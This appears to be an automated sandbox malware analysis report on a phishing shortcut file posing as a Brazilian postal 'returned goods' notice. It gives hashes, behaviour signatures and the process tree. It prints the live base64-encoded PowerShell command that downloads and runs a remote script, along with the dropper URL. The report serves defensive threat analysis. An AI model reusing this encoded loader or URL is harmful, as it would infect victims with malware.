41aa6d3ed7b982e06a274710b154b51127526a58743784559daf4bd97cd80b46

General

Target

Mercadoria_Devolvida-Correios-OFQL7QEY.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2192	powershell.exe
11	2192	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4920 wrote to memory of 2192	4920	cmd.exe	83
PID 4920 wrote to memory of 2192	4920	cmd.exe	83
PID 2192 wrote to memory of 4120	2192	powershell.exe	86
PID 2192 wrote to memory of 4120	2192	powershell.exe	86
PID 4120 wrote to memory of 4884	4120	csc.exe	88
PID 4120 wrote to memory of 4884	4120	csc.exe	88

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-OFQL7QEY.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4920
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kcfjtirl\kcfjtirl.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4120
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37B9.tmp" "c:\Users\Admin\AppData\Local\Temp\kcfjtirl\CSCCFCDC9C416CA4EEE891D5D1BAFE0AB17.TMP"
      4⤵
      PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES37B9.tmp

Filesize
1KB

MD5
19e227014d149c0a3f379e5e70922eb5

SHA1
fb0e3a9b3df457a7755ced3a3a1bf9d89dfefa2c

SHA256
9a541dc98a48036810a51a1ea556422546a0a3db079bdbd990b74d5c67f11bbb

SHA512
2629c9344dad1c6ab577e7bc520c6fc5542af74f1f3759d18df6ce268751517926391465e597e88994c3151fa13e2dfebb0a6be701451a7b3d47df9b63bd9164

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tg4ejhlw.wjm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kcfjtirl\kcfjtirl.dll

Filesize
3KB

MD5
64ad54ac4762c204e35cc2aa2afbe138

SHA1
a5b2cf99d20b8ea9f479ed86ac66753aaa18b89d

SHA256
9c4c18cfe47e8d2469a2dc8903f1b5bbba58da0fc97b6334e97b99d4d1fb42a0

SHA512
ed10ff673316f4d0a06bd7c66ea0d5536e594ee971ca378e40c78ac357e05f3205322c311d489139faabc324a2a45c2966b4a9b13c8725fe159dd8b3244f43e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kcfjtirl\CSCCFCDC9C416CA4EEE891D5D1BAFE0AB17.TMP

Filesize
652B

MD5
0c99a0123d01ce9cdecc48c4775b0495

SHA1
e05f4f643d9b7633125bd3b26a907ab795bf1893

SHA256
e8d8e5c28880c4460a461e6b434d984eb7c565f310600d216ac358364216499f

SHA512
cc6801a73d2cc5068f8586aceaba1be4f3a53b0e53c3caf8f69dff1eeed0a72d9acf6c6287ff5f1c3db28df1a451e08d606342109ac3b4b6d36f92a464c6156d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kcfjtirl\kcfjtirl.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kcfjtirl\kcfjtirl.cmdline

Filesize
369B

MD5
85629c779fe3ef8d795c75a82222b0da

SHA1
66d3034c7a627922d7f7e14820c187992feeca62

SHA256
8205b1f1817e54e4988d5816f8f43a51468234d837e5bd3857445a81c91129ae

SHA512
e18394037de0c8c6ced9a84384fd6f0a6d0023b8bcf5346dbeb487d4912b470456f55dbaf6627f43ee5bb1c646a581ab61e723f38df462a82cb535ae84a0c309

Download Submit
memory/2192-2-0x00007FFF9FB63000-0x00007FFF9FB65000-memory.dmp

Filesize
8KB

Download
memory/2192-3-0x000001DEE2C60000-0x000001DEE2C82000-memory.dmp

Filesize
136KB

Download
memory/2192-13-0x00007FFF9FB60000-0x00007FFFA0621000-memory.dmp

Filesize
10.8MB

Download
memory/2192-14-0x00007FFF9FB60000-0x00007FFFA0621000-memory.dmp

Filesize
10.8MB

Download
memory/2192-27-0x000001DECAA30000-0x000001DECAA38000-memory.dmp

Filesize
32KB

Download
memory/2192-31-0x00007FFF9FB60000-0x00007FFFA0621000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing